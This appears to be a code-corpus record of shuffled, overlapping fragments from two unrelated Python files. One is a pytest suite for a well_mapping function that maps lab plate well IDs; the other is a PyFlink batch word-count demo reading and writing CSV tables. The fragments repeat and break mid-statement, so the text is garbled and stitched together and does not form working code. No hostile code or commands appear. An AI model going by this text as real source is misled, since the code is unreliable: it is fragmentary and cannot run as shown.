"\"\"\" Tests valid specifications do not throw an error \"\"\" _ = well_mapping(",
"'C8', 'F4', 'F8', 'D6']: assert result[key] == 'foo' def test_normed_and_unnormed_single_well(): \"\"\" Tests that",
"== 'foo.baz' assert result['A01'] == 'foo.baz' assert result['A10'] == 'bar.baz' def test_normed_unnormed_input(): \"\"\"",
"that we can override the mapping separator. \"\"\" for sep in r'!@#$%^&*()<>,\\/': result",
"and un-normalized well-IDs are handled for looking up a rectangular mapping entry. \"\"\"",
"{'bar': 'A1'}]) print(result) assert result['A01'] == 'foo.bar' def test_custom_separator(): \"\"\" Tests that we",
"key in ['C4', 'C8', 'F4', 'F8', 'D6']: assert result[key] == 'foo' def test_normed_and_unnormed_single_well():",
"Tests that normalized and unnormalized input well mappings work. \"\"\" result = well_mapping(",
"rectangular mapping entry. \"\"\" result = well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'}, {'baz': 'A1-A10'}]) assert",
"input well mappings work. \"\"\" result = well_mapping( [{'foo': 'A1-G9'}, {'bar': 'A01-G09'}, {'baz':",
"that invalid specifications throw errors \"\"\" with pytest.raises(ValueError): _ = well_mapping({'a': ''}) with",
"def test_normed_and_unnormed_mix(): \"\"\" Tests that normalized and un-normalized well-IDs are handled for looking",
"a mix of mapping entries. \"\"\" result = well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'}, {'baz':",
"'A1'}, {'bar': 'A10'}, {'baz': 'A1,A10'}]) assert result['A1'] == 'foo.baz' assert result['A01'] == 'foo.baz'",
"{'bar': 'A1'}], separator=sep) assert result['A01'] == f'foo{sep}bar' def test_valid_mapping_spec(): \"\"\" Tests valid specifications",
"that normalized and un-normalized well-IDs are handled for looking up a mix of",
"'A10'}, {'baz': 'A1,A10'}]) assert result['A1'] == 'foo.baz' assert result['A01'] == 'foo.baz' assert result['A10']",
"result['A01'] == 'foo.bar' def test_custom_separator(): \"\"\" Tests that we can override the mapping",
"= well_mapping([{'foo': 'A1'}, {'bar': 'A1'}], separator=sep) assert result['A01'] == f'foo{sep}bar' def test_valid_mapping_spec(): \"\"\"",
"_ = well_mapping({'a': ''}) with pytest.raises(ValueError): _ = well_mapping({'a': 'Z99'}) with pytest.raises(ValueError): _",
"throw errors \"\"\" with pytest.raises(ValueError): _ = well_mapping({'a': ''}) with pytest.raises(ValueError): _ =",
"\"\"\" for sep in r'!@#$%^&*()<>,\\/': result = well_mapping([{'foo': 'A1'}, {'bar': 'A1'}], separator=sep) assert",
"'D6']: assert result[key] == 'foo' def test_normed_and_unnormed_single_well(): \"\"\" Tests that normalized and un-normalized",
"= well_mapping( [{'foo': 'A1-G9'}, {'bar': 'A01-G09'}, {'baz': 'A1-G09'}, {'qaz': 'A01-G9'}] ) for i",
"handled for looking up a single well entry. \"\"\" result = well_mapping([{'foo': 'A1'},",
"'foo.baz' assert result['A10'] == 'bar.baz' def test_normed_unnormed_input(): \"\"\" Tests that normalized and unnormalized",
"{'baz': 'A1-G09'}, {'qaz': 'A01-G9'}] ) for i in range(1, 10): assert result[f'A{i}'] ==",
"with pytest.raises(ValueError): _ = well_mapping({'a': ''}) with pytest.raises(ValueError): _ = well_mapping({'a': 'Z99'}) with",
"for looking up a mix of mapping entries. \"\"\" result = well_mapping([{'foo': 'A1-A5'},",
"result['A1'] == 'foo.baz' assert result['A01'] == 'foo.baz' assert result['A10'] == 'bar.baz' def test_normed_unnormed_input():",
"and unnormalized input well mappings work. \"\"\" result = well_mapping( [{'foo': 'A1-G9'}, {'bar':",
"is a period, and that conditions are properly merged together. \"\"\" result =",
"Tests that invalid specifications throw errors \"\"\" with pytest.raises(ValueError): _ = well_mapping({'a': ''})",
"un-normalized well-IDs are handled for looking up a rectangular mapping entry. \"\"\" result",
"= well_mapping({'a': 'Z99'}) with pytest.raises(ValueError): _ = well_mapping({'a': 'A1:A15'}) def test_backwards_rectangles(): \"\"\" Tests",
"specifications do not throw an error \"\"\" _ = well_mapping( { 'a': 'A01',",
"\"\"\" Tests that we can override the mapping separator. \"\"\" for sep in",
"\"\"\" result = well_mapping([{'foo': 'A1'}, {'bar': 'A1'}]) print(result) assert result['A01'] == 'foo.bar' def",
"test_valid_mapping_spec(): \"\"\" Tests valid specifications do not throw an error \"\"\" _ =",
"'A01', 'b': 'A1', 'c': 'A2,', # allow trailing commas 'd': 'A1-B12', 'e': 'A1-B12,C5,C4-F8',",
"invalid specifications throw errors \"\"\" with pytest.raises(ValueError): _ = well_mapping({'a': ''}) with pytest.raises(ValueError):",
"properly merged together. \"\"\" result = well_mapping([{'foo': 'A1'}, {'bar': 'A1'}]) print(result) assert result['A01']",
"'foo.baz' assert result['A10'] == 'bar.baz' def test_normed_and_unnormed_mix(): \"\"\" Tests that normalized and un-normalized",
"that normalized and un-normalized well-IDs are handled for looking up a single well",
"{'bar': 'A6-A10'}, {'baz': 'A1-A10'}]) assert result['A1'] == 'foo.baz' assert result['A01'] == 'foo.baz' assert",
"separator. \"\"\" for sep in r'!@#$%^&*()<>,\\/': result = well_mapping([{'foo': 'A1'}, {'bar': 'A1'}], separator=sep)",
"'A1-B12, C12, D4', # allow whitespace } ) assert True def test_invalid_mapping_spec(): \"\"\"",
"_ = well_mapping({'a': 'A1:A15'}) def test_backwards_rectangles(): \"\"\" Tests that arbitrary rectangles are allowed",
"valid specifications do not throw an error \"\"\" _ = well_mapping( { 'a':",
"def test_normed_and_unnormed_rectangle(): \"\"\" Tests that normalized and un-normalized well-IDs are handled for looking",
"of mapping entries. \"\"\" result = well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'}, {'baz': 'A1,A10'}]) assert",
"well mappings work. \"\"\" result = well_mapping( [{'foo': 'A1-G9'}, {'bar': 'A01-G09'}, {'baz': 'A1-G09'},",
"\"\"\" result = well_mapping([{'foo': 'F8-C4'}]) for key in ['C4', 'C8', 'F4', 'F8', 'D6']:",
"['C4', 'C8', 'F4', 'F8', 'D6']: assert result[key] == 'foo' def test_normed_and_unnormed_single_well(): \"\"\" Tests",
"Tests that normalized and un-normalized well-IDs are handled for looking up a rectangular",
"'A2,', # allow trailing commas 'd': 'A1-B12', 'e': 'A1-B12,C5,C4-F8', 'f': 'A1-B12, C12, D4',",
"pytest.raises(ValueError): _ = well_mapping({'a': ''}) with pytest.raises(ValueError): _ = well_mapping({'a': 'Z99'}) with pytest.raises(ValueError):",
"'A6-A10'}, {'baz': 'A1-A10'}]) assert result['A1'] == 'foo.baz' assert result['A01'] == 'foo.baz' assert result['A10']",
"{ 'a': 'A01', 'b': 'A1', 'c': 'A2,', # allow trailing commas 'd': 'A1-B12',",
"def test_backwards_rectangles(): \"\"\" Tests that arbitrary rectangles are allowed (even those that are",
"handled for looking up a rectangular mapping entry. \"\"\" result = well_mapping([{'foo': 'A1-A5'},",
"'A01-G09'}, {'baz': 'A1-G09'}, {'qaz': 'A01-G9'}] ) for i in range(1, 10): assert result[f'A{i}']",
"== 'bar.baz' def test_normed_unnormed_input(): \"\"\" Tests that normalized and unnormalized input well mappings",
"'e': 'A1-B12,C5,C4-F8', 'f': 'A1-B12, C12, D4', # allow whitespace } ) assert True",
"well_mapping({'a': 'A1:A15'}) def test_backwards_rectangles(): \"\"\" Tests that arbitrary rectangles are allowed (even those",
"mapping separator. \"\"\" for sep in r'!@#$%^&*()<>,\\/': result = well_mapping([{'foo': 'A1'}, {'bar': 'A1'}],",
"normalized and unnormalized input well mappings work. \"\"\" result = well_mapping( [{'foo': 'A1-G9'},",
"'A1'}], separator=sep) assert result['A01'] == f'foo{sep}bar' def test_valid_mapping_spec(): \"\"\" Tests valid specifications do",
"== f'foo{sep}bar' def test_valid_mapping_spec(): \"\"\" Tests valid specifications do not throw an error",
"[{'foo': 'A1-G9'}, {'bar': 'A01-G09'}, {'baz': 'A1-G09'}, {'qaz': 'A01-G9'}] ) for i in range(1,",
"well_mapping([{'foo': 'A1'}, {'bar': 'A1'}]) print(result) assert result['A01'] == 'foo.bar' def test_custom_separator(): \"\"\" Tests",
"are not upper-left corner to bottom-right) \"\"\" result = well_mapping([{'foo': 'F8-C4'}]) for key",
"that arbitrary rectangles are allowed (even those that are not upper-left corner to",
"'F4', 'F8', 'D6']: assert result[key] == 'foo' def test_normed_and_unnormed_single_well(): \"\"\" Tests that normalized",
"C12, D4', # allow whitespace } ) assert True def test_invalid_mapping_spec(): \"\"\" Tests",
"well-IDs are handled for looking up a single well entry. \"\"\" result =",
"default separator is a period, and that conditions are properly merged together. \"\"\"",
"result['A10'] == 'bar.baz' def test_normed_and_unnormed_mix(): \"\"\" Tests that normalized and un-normalized well-IDs are",
"'foo.baz' assert result['A01'] == 'foo.baz' assert result['A10'] == 'bar.baz' def test_normed_unnormed_input(): \"\"\" Tests",
"well_mapping({'a': 'Z99'}) with pytest.raises(ValueError): _ = well_mapping({'a': 'A1:A15'}) def test_backwards_rectangles(): \"\"\" Tests that",
"we can override the mapping separator. \"\"\" for sep in r'!@#$%^&*()<>,\\/': result =",
"{'bar': 'A10'}, {'baz': 'A1,A10'}]) assert result['A1'] == 'foo.baz' assert result['A01'] == 'foo.baz' assert",
"result = well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'}, {'baz': 'A1-A10'}]) assert result['A1'] == 'foo.baz' assert",
"'foo.bar' def test_custom_separator(): \"\"\" Tests that we can override the mapping separator. \"\"\"",
"well_mapping def test_default_separator(): \"\"\" Tests that the default separator is a period, and",
"mapping entry. \"\"\" result = well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'}, {'baz': 'A1-A10'}]) assert result['A1']",
"single well entry. \"\"\" result = well_mapping([{'foo': 'A1'}, {'bar': 'A10'}, {'baz': 'A1,A10'}]) assert",
"rectangles are allowed (even those that are not upper-left corner to bottom-right) \"\"\"",
"\"\"\" Tests that normalized and un-normalized well-IDs are handled for looking up a",
"'A1-A5'}, {'bar': 'A6-A10'}, {'baz': 'A1-A10'}]) assert result['A1'] == 'foo.baz' assert result['A01'] == 'foo.baz'",
"== 'foo.baz' assert result['A10'] == 'bar.baz' def test_normed_and_unnormed_mix(): \"\"\" Tests that normalized and",
"unnormalized input well mappings work. \"\"\" result = well_mapping( [{'foo': 'A1-G9'}, {'bar': 'A01-G09'},",
"entry. \"\"\" result = well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'}, {'baz': 'A1-A10'}]) assert result['A1'] ==",
"error \"\"\" _ = well_mapping( { 'a': 'A01', 'b': 'A1', 'c': 'A2,', #",
"in ['C4', 'C8', 'F4', 'F8', 'D6']: assert result[key] == 'foo' def test_normed_and_unnormed_single_well(): \"\"\"",
"result['A1'] == 'foo.baz' assert result['A01'] == 'foo.baz' assert result['A10'] == 'bar.baz' def test_normed_and_unnormed_rectangle():",
"assert result['A01'] == 'foo.baz' assert result['A10'] == 'bar.baz' def test_normed_and_unnormed_rectangle(): \"\"\" Tests that",
"assert True def test_invalid_mapping_spec(): \"\"\" Tests that invalid specifications throw errors \"\"\" with",
"for looking up a single well entry. \"\"\" result = well_mapping([{'foo': 'A1'}, {'bar':",
"= well_mapping( { 'a': 'A01', 'b': 'A1', 'c': 'A2,', # allow trailing commas",
"do not throw an error \"\"\" _ = well_mapping( { 'a': 'A01', 'b':",
"== 'bar.baz' def test_normed_and_unnormed_mix(): \"\"\" Tests that normalized and un-normalized well-IDs are handled",
"{'bar': 'A6-A10'}, {'baz': 'A1,A10'}]) assert result['A1'] == 'foo.baz' assert result['A01'] == 'foo.baz' assert",
"well-IDs are handled for looking up a rectangular mapping entry. \"\"\" result =",
"= well_mapping({'a': 'A1:A15'}) def test_backwards_rectangles(): \"\"\" Tests that arbitrary rectangles are allowed (even",
"== 'foo.baz' assert result['A01'] == 'foo.baz' assert result['A10'] == 'bar.baz' def test_normed_and_unnormed_rectangle(): \"\"\"",
"looking up a mix of mapping entries. \"\"\" result = well_mapping([{'foo': 'A1-A5'}, {'bar':",
"errors \"\"\" with pytest.raises(ValueError): _ = well_mapping({'a': ''}) with pytest.raises(ValueError): _ = well_mapping({'a':",
"'A1,A10'}]) assert result['A1'] == 'foo.baz' assert result['A01'] == 'foo.baz' assert result['A10'] == 'bar.baz'",
"'bar.baz' def test_normed_and_unnormed_rectangle(): \"\"\" Tests that normalized and un-normalized well-IDs are handled for",
"\"\"\" result = well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'}, {'baz': 'A1,A10'}]) assert result['A1'] == 'foo.baz'",
"import well_mapping def test_default_separator(): \"\"\" Tests that the default separator is a period,",
"'A1', 'c': 'A2,', # allow trailing commas 'd': 'A1-B12', 'e': 'A1-B12,C5,C4-F8', 'f': 'A1-B12,",
"un-normalized well-IDs are handled for looking up a single well entry. \"\"\" result",
"with pytest.raises(ValueError): _ = well_mapping({'a': 'A1:A15'}) def test_backwards_rectangles(): \"\"\" Tests that arbitrary rectangles",
"together. \"\"\" result = well_mapping([{'foo': 'A1'}, {'bar': 'A1'}]) print(result) assert result['A01'] == 'foo.bar'",
"not upper-left corner to bottom-right) \"\"\" result = well_mapping([{'foo': 'F8-C4'}]) for key in",
"= well_mapping([{'foo': 'A1'}, {'bar': 'A10'}, {'baz': 'A1,A10'}]) assert result['A1'] == 'foo.baz' assert result['A01']",
"'F8-C4'}]) for key in ['C4', 'C8', 'F4', 'F8', 'D6']: assert result[key] == 'foo'",
"def test_normed_and_unnormed_single_well(): \"\"\" Tests that normalized and un-normalized well-IDs are handled for looking",
"\"\"\" result = well_mapping( [{'foo': 'A1-G9'}, {'bar': 'A01-G09'}, {'baz': 'A1-G09'}, {'qaz': 'A01-G9'}] )",
"\"\"\" with pytest.raises(ValueError): _ = well_mapping({'a': ''}) with pytest.raises(ValueError): _ = well_mapping({'a': 'Z99'})",
"\"\"\" Tests that the default separator is a period, and that conditions are",
"that normalized and unnormalized input well mappings work. \"\"\" result = well_mapping( [{'foo':",
"whitespace } ) assert True def test_invalid_mapping_spec(): \"\"\" Tests that invalid specifications throw",
"well_mapping( { 'a': 'A01', 'b': 'A1', 'c': 'A2,', # allow trailing commas 'd':",
"== 'foo.bar' def test_custom_separator(): \"\"\" Tests that we can override the mapping separator.",
"== 'foo.baz' assert result['A10'] == 'bar.baz' def test_normed_unnormed_input(): \"\"\" Tests that normalized and",
"and that conditions are properly merged together. \"\"\" result = well_mapping([{'foo': 'A1'}, {'bar':",
"Tests that the default separator is a period, and that conditions are properly",
"that are not upper-left corner to bottom-right) \"\"\" result = well_mapping([{'foo': 'F8-C4'}]) for",
"Tests that normalized and un-normalized well-IDs are handled for looking up a single",
"test_custom_separator(): \"\"\" Tests that we can override the mapping separator. \"\"\" for sep",
"pytest.raises(ValueError): _ = well_mapping({'a': 'A1:A15'}) def test_backwards_rectangles(): \"\"\" Tests that arbitrary rectangles are",
"def test_custom_separator(): \"\"\" Tests that we can override the mapping separator. \"\"\" for",
"and un-normalized well-IDs are handled for looking up a single well entry. \"\"\"",
"that normalized and un-normalized well-IDs are handled for looking up a rectangular mapping",
"mapping entries. \"\"\" result = well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'}, {'baz': 'A1,A10'}]) assert result['A1']",
"Tests that we can override the mapping separator. \"\"\" for sep in r'!@#$%^&*()<>,\\/':",
"result['A1'] == 'foo.baz' assert result['A01'] == 'foo.baz' assert result['A10'] == 'bar.baz' def test_normed_and_unnormed_mix():",
"'A1'}]) print(result) assert result['A01'] == 'foo.bar' def test_custom_separator(): \"\"\" Tests that we can",
"\"\"\" result = well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'}, {'baz': 'A1-A10'}]) assert result['A1'] == 'foo.baz'",
"{'bar': 'A01-G09'}, {'baz': 'A1-G09'}, {'qaz': 'A01-G9'}] ) for i in range(1, 10): assert",
"_ = well_mapping({'a': 'Z99'}) with pytest.raises(ValueError): _ = well_mapping({'a': 'A1:A15'}) def test_backwards_rectangles(): \"\"\"",
"assert result['A10'] == 'bar.baz' def test_normed_and_unnormed_rectangle(): \"\"\" Tests that normalized and un-normalized well-IDs",
"== 'foo.baz' assert result['A10'] == 'bar.baz' def test_normed_and_unnormed_rectangle(): \"\"\" Tests that normalized and",
"an error \"\"\" _ = well_mapping( { 'a': 'A01', 'b': 'A1', 'c': 'A2,',",
"from rushd.well_mapper import well_mapping def test_default_separator(): \"\"\" Tests that the default separator is",
"those that are not upper-left corner to bottom-right) \"\"\" result = well_mapping([{'foo': 'F8-C4'}])",
"'foo.baz' assert result['A01'] == 'foo.baz' assert result['A10'] == 'bar.baz' def test_normed_and_unnormed_rectangle(): \"\"\" Tests",
"_ = well_mapping( { 'a': 'A01', 'b': 'A1', 'c': 'A2,', # allow trailing",
"test_normed_and_unnormed_rectangle(): \"\"\" Tests that normalized and un-normalized well-IDs are handled for looking up",
"normalized and un-normalized well-IDs are handled for looking up a rectangular mapping entry.",
"assert result['A10'] == 'bar.baz' def test_normed_and_unnormed_mix(): \"\"\" Tests that normalized and un-normalized well-IDs",
"looking up a single well entry. \"\"\" result = well_mapping([{'foo': 'A1'}, {'bar': 'A10'},",
"in r'!@#$%^&*()<>,\\/': result = well_mapping([{'foo': 'A1'}, {'bar': 'A1'}], separator=sep) assert result['A01'] == f'foo{sep}bar'",
"work. \"\"\" result = well_mapping( [{'foo': 'A1-G9'}, {'bar': 'A01-G09'}, {'baz': 'A1-G09'}, {'qaz': 'A01-G9'}]",
"{'baz': 'A1,A10'}]) assert result['A1'] == 'foo.baz' assert result['A01'] == 'foo.baz' assert result['A10'] ==",
"are handled for looking up a rectangular mapping entry. \"\"\" result = well_mapping([{'foo':",
"override the mapping separator. \"\"\" for sep in r'!@#$%^&*()<>,\\/': result = well_mapping([{'foo': 'A1'},",
"mappings work. \"\"\" result = well_mapping( [{'foo': 'A1-G9'}, {'bar': 'A01-G09'}, {'baz': 'A1-G09'}, {'qaz':",
"are handled for looking up a single well entry. \"\"\" result = well_mapping([{'foo':",
"normalized and un-normalized well-IDs are handled for looking up a mix of mapping",
"result['A01'] == 'foo.baz' assert result['A10'] == 'bar.baz' def test_normed_and_unnormed_mix(): \"\"\" Tests that normalized",
"} ) assert True def test_invalid_mapping_spec(): \"\"\" Tests that invalid specifications throw errors",
"import pytest from rushd.well_mapper import well_mapping def test_default_separator(): \"\"\" Tests that the default",
"assert result['A01'] == 'foo.bar' def test_custom_separator(): \"\"\" Tests that we can override the",
"'Z99'}) with pytest.raises(ValueError): _ = well_mapping({'a': 'A1:A15'}) def test_backwards_rectangles(): \"\"\" Tests that arbitrary",
"'A1:A15'}) def test_backwards_rectangles(): \"\"\" Tests that arbitrary rectangles are allowed (even those that",
"result = well_mapping([{'foo': 'A1'}, {'bar': 'A10'}, {'baz': 'A1,A10'}]) assert result['A1'] == 'foo.baz' assert",
"'foo.baz' assert result['A10'] == 'bar.baz' def test_normed_and_unnormed_rectangle(): \"\"\" Tests that normalized and un-normalized",
"that conditions are properly merged together. \"\"\" result = well_mapping([{'foo': 'A1'}, {'bar': 'A1'}])",
"for looking up a rectangular mapping entry. \"\"\" result = well_mapping([{'foo': 'A1-A5'}, {'bar':",
"Tests that arbitrary rectangles are allowed (even those that are not upper-left corner",
"'f': 'A1-B12, C12, D4', # allow whitespace } ) assert True def test_invalid_mapping_spec():",
"result[key] == 'foo' def test_normed_and_unnormed_single_well(): \"\"\" Tests that normalized and un-normalized well-IDs are",
"looking up a rectangular mapping entry. \"\"\" result = well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'},",
"result = well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'}, {'baz': 'A1,A10'}]) assert result['A1'] == 'foo.baz' assert",
"= well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'}, {'baz': 'A1,A10'}]) assert result['A1'] == 'foo.baz' assert result['A01']",
"test_normed_unnormed_input(): \"\"\" Tests that normalized and unnormalized input well mappings work. \"\"\" result",
"and un-normalized well-IDs are handled for looking up a mix of mapping entries.",
"conditions are properly merged together. \"\"\" result = well_mapping([{'foo': 'A1'}, {'bar': 'A1'}]) print(result)",
"Tests valid specifications do not throw an error \"\"\" _ = well_mapping( {",
"<reponame>GallowayLabMIT/rushd import pytest from rushd.well_mapper import well_mapping def test_default_separator(): \"\"\" Tests that the",
"= well_mapping([{'foo': 'A1'}, {'bar': 'A1'}]) print(result) assert result['A01'] == 'foo.bar' def test_custom_separator(): \"\"\"",
"'A1'}, {'bar': 'A1'}], separator=sep) assert result['A01'] == f'foo{sep}bar' def test_valid_mapping_spec(): \"\"\" Tests valid",
"to bottom-right) \"\"\" result = well_mapping([{'foo': 'F8-C4'}]) for key in ['C4', 'C8', 'F4',",
"r'!@#$%^&*()<>,\\/': result = well_mapping([{'foo': 'A1'}, {'bar': 'A1'}], separator=sep) assert result['A01'] == f'foo{sep}bar' def",
"test_normed_and_unnormed_mix(): \"\"\" Tests that normalized and un-normalized well-IDs are handled for looking up",
"are handled for looking up a mix of mapping entries. \"\"\" result =",
"'A1-A5'}, {'bar': 'A6-A10'}, {'baz': 'A1,A10'}]) assert result['A1'] == 'foo.baz' assert result['A01'] == 'foo.baz'",
"handled for looking up a mix of mapping entries. \"\"\" result = well_mapping([{'foo':",
"result = well_mapping( [{'foo': 'A1-G9'}, {'bar': 'A01-G09'}, {'baz': 'A1-G09'}, {'qaz': 'A01-G9'}] ) for",
"'A6-A10'}, {'baz': 'A1,A10'}]) assert result['A1'] == 'foo.baz' assert result['A01'] == 'foo.baz' assert result['A10']",
"assert result['A01'] == f'foo{sep}bar' def test_valid_mapping_spec(): \"\"\" Tests valid specifications do not throw",
"allowed (even those that are not upper-left corner to bottom-right) \"\"\" result =",
"def test_valid_mapping_spec(): \"\"\" Tests valid specifications do not throw an error \"\"\" _",
"that the default separator is a period, and that conditions are properly merged",
"'A1'}, {'bar': 'A1'}]) print(result) assert result['A01'] == 'foo.bar' def test_custom_separator(): \"\"\" Tests that",
"well entry. \"\"\" result = well_mapping([{'foo': 'A1'}, {'bar': 'A10'}, {'baz': 'A1,A10'}]) assert result['A1']",
"well_mapping( [{'foo': 'A1-G9'}, {'bar': 'A01-G09'}, {'baz': 'A1-G09'}, {'qaz': 'A01-G9'}] ) for i in",
"trailing commas 'd': 'A1-B12', 'e': 'A1-B12,C5,C4-F8', 'f': 'A1-B12, C12, D4', # allow whitespace",
"'A1-G09'}, {'qaz': 'A01-G9'}] ) for i in range(1, 10): assert result[f'A{i}'] == 'foo.bar.baz.qaz'",
"well-IDs are handled for looking up a mix of mapping entries. \"\"\" result",
"entries. \"\"\" result = well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'}, {'baz': 'A1,A10'}]) assert result['A1'] ==",
"up a mix of mapping entries. \"\"\" result = well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'},",
"a single well entry. \"\"\" result = well_mapping([{'foo': 'A1'}, {'bar': 'A10'}, {'baz': 'A1,A10'}])",
"D4', # allow whitespace } ) assert True def test_invalid_mapping_spec(): \"\"\" Tests that",
"'c': 'A2,', # allow trailing commas 'd': 'A1-B12', 'e': 'A1-B12,C5,C4-F8', 'f': 'A1-B12, C12,",
"well_mapping([{'foo': 'A1'}, {'bar': 'A1'}], separator=sep) assert result['A01'] == f'foo{sep}bar' def test_valid_mapping_spec(): \"\"\" Tests",
"'A1-B12,C5,C4-F8', 'f': 'A1-B12, C12, D4', # allow whitespace } ) assert True def",
"''}) with pytest.raises(ValueError): _ = well_mapping({'a': 'Z99'}) with pytest.raises(ValueError): _ = well_mapping({'a': 'A1:A15'})",
"result['A01'] == 'foo.baz' assert result['A10'] == 'bar.baz' def test_normed_unnormed_input(): \"\"\" Tests that normalized",
"result = well_mapping([{'foo': 'A1'}, {'bar': 'A1'}]) print(result) assert result['A01'] == 'foo.bar' def test_custom_separator():",
"allow trailing commas 'd': 'A1-B12', 'e': 'A1-B12,C5,C4-F8', 'f': 'A1-B12, C12, D4', # allow",
"= well_mapping({'a': ''}) with pytest.raises(ValueError): _ = well_mapping({'a': 'Z99'}) with pytest.raises(ValueError): _ =",
"normalized and un-normalized well-IDs are handled for looking up a single well entry.",
"well_mapping([{'foo': 'A1'}, {'bar': 'A10'}, {'baz': 'A1,A10'}]) assert result['A1'] == 'foo.baz' assert result['A01'] ==",
"assert result['A1'] == 'foo.baz' assert result['A01'] == 'foo.baz' assert result['A10'] == 'bar.baz' def",
"are properly merged together. \"\"\" result = well_mapping([{'foo': 'A1'}, {'bar': 'A1'}]) print(result) assert",
"not throw an error \"\"\" _ = well_mapping( { 'a': 'A01', 'b': 'A1',",
"for key in ['C4', 'C8', 'F4', 'F8', 'D6']: assert result[key] == 'foo' def",
"result = well_mapping([{'foo': 'A1'}, {'bar': 'A1'}], separator=sep) assert result['A01'] == f'foo{sep}bar' def test_valid_mapping_spec():",
"period, and that conditions are properly merged together. \"\"\" result = well_mapping([{'foo': 'A1'},",
"'d': 'A1-B12', 'e': 'A1-B12,C5,C4-F8', 'f': 'A1-B12, C12, D4', # allow whitespace } )",
"result['A10'] == 'bar.baz' def test_normed_unnormed_input(): \"\"\" Tests that normalized and unnormalized input well",
"\"\"\" _ = well_mapping( { 'a': 'A01', 'b': 'A1', 'c': 'A2,', # allow",
"throw an error \"\"\" _ = well_mapping( { 'a': 'A01', 'b': 'A1', 'c':",
"well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'}, {'baz': 'A1-A10'}]) assert result['A1'] == 'foo.baz' assert result['A01'] =="
] |
[
"demo01(): exec_env = ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1) t_config = TableConfig() t_env = BatchTableEnvironment.create(exec_env, t_config) #",
"'filesystem', 'format.type' = 'csv', 'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/input' ) \"\"\" my_sink_ddl = \"\"\" create",
"from pyflink.table import expressions as expr from pyflink.table.descriptors import OldCsv, FileSystem, Schema from",
"# StreamExecutionEnvironment t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\input')) \\ .with_format(OldCsv() .field('word', DataTypes.STRING())) \\ .with_schema(Schema() .field('word', DataTypes.STRING())) \\ .create_temporary_table('mySource')",
"pyflink.table.expressions import lit def demo01(): exec_env = ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1) t_config = TableConfig() t_env",
"\\ .with_schema(Schema() .field('word', DataTypes.STRING())) \\ .create_temporary_table('mySource') # 文件存在会报错 t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\output')) \\ .with_format(OldCsv() .field_delimiter('\\t') .field('word',",
"tab = t_env.from_path('mySource') tab.group_by(tab.word) \\ .select(tab.word, lit(1).count) \\ .execute_insert('mySink').wait() if __name__ == '__main__':",
"my_sink_ddl = \"\"\" create table mySink ( word VARCHAR, `count` BIGINT ) with",
"\\ .select(tab.word, lit(1).count) \\ .execute_insert('mySink').wait() def demo02(): exec_env = ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1) t_config =",
"= \"\"\" create table mySink ( word VARCHAR, `count` BIGINT ) with (",
"= BatchTableEnvironment.create(exec_env, t_config) # StreamExecutionEnvironment my_source_ddl = \"\"\" create table mySource ( word",
".execute_insert('mySink').wait() def demo02(): exec_env = ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1) t_config = TableConfig() t_env = BatchTableEnvironment.create(exec_env,",
"pyflink.table import expressions as expr from pyflink.table.descriptors import OldCsv, FileSystem, Schema from pyflink.table.expressions",
"sys import tempfile from pyflink.dataset import ExecutionEnvironment from pyflink.table import BatchTableEnvironment, TableConfig, DataTypes",
"shutil import sys import tempfile from pyflink.dataset import ExecutionEnvironment from pyflink.table import BatchTableEnvironment,",
"OldCsv, FileSystem, Schema from pyflink.table.expressions import lit def demo01(): exec_env = ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1)",
"as expr from pyflink.table.descriptors import OldCsv, FileSystem, Schema from pyflink.table.expressions import lit def",
"tab.group_by(tab.word) \\ .select(tab.word, lit(1).count) \\ .execute_insert('mySink').wait() def demo02(): exec_env = ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1) t_config",
"mySink ( word VARCHAR, `count` BIGINT ) with ( 'connector' = 'filesystem', 'format.type'",
"= t_env.from_path('mySource') tab.group_by(tab.word) \\ .select(tab.word, lit(1).count) \\ .execute_insert('mySink').wait() def demo02(): exec_env = ExecutionEnvironment.get_execution_environment()",
"( 'connector' = 'filesystem', 'format.type' = 'csv', 'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/output' ) \"\"\" t_env.execute_sql(my_source_ddl)",
"mySource ( word VARCHAR ) with ( 'connector' = 'filesystem', 'format.type' = 'csv',",
"os import shutil import sys import tempfile from pyflink.dataset import ExecutionEnvironment from pyflink.table",
"table mySource ( word VARCHAR ) with ( 'connector' = 'filesystem', 'format.type' =",
"\\ .with_schema(Schema() .field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\ .create_temporary_table('mySink') tab = t_env.from_path('mySource') tab.group_by(tab.word) \\",
"import sys import tempfile from pyflink.dataset import ExecutionEnvironment from pyflink.table import BatchTableEnvironment, TableConfig,",
"t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\output')) \\ .with_format(OldCsv() .field_delimiter('\\t') .field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\ .with_schema(Schema() .field('word', DataTypes.STRING()) .field('count',",
"create table mySink ( word VARCHAR, `count` BIGINT ) with ( 'connector' =",
